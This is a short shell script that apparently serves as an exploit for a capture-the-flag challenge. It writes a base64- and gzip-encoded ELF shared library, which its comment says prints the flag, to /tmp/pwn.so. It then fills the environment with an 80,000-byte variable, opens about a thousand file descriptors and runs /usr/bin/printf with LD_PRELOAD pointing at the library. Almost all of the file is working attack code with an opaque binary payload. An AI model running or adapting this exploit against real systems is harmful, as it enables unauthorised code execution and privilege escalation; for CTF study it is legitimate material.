#!/bin/sh
set -e

# A golfed ELF .so library that prints the flag to stdout. Generated by build.py.
base64 -d <<EOF | gzip -d >/tmp/pwn.so
H4sIAFxujWUAA6t39XFjYmRkgAFmBjsGEG8DgwKY7wAV90EoAYpZMDABSSagSpAwKwMyUEChLaH6
YDSDAIRiAmIWIJaEiksyKqDQqKYwMMC07wBp9Nivn5aTmA5khXt0Pt8HEje8xM/q0fyDocbSs/PI
DrCLO597dD7bBdIIkSpRqJHZAeLuBxEocoylTK9P8XPvsAHJMoBF2RhQAQ+UhgWMXkplXmJuZjKD
XnFGcUlRSWISWJgN6jdUP2H3CzrgZACFPyaAhZ0wDn0wAAB9ypXjzAEAAA==
EOF

evil=$(yes | tr -d '\n' | head -c 80000)
unset $(set | grep '^.*=' | grep -v evil | cut -f1 -d=)

fd=3
while [ $fd -le 1000 ]
do
    eval "exec ${fd}<&0"
    fd=$(( fd + 1 ))
done

LD_PRELOAD=/tmp/pwn.so /usr/bin/printf 'No luck, please try running the exploit again\n' ${evil}
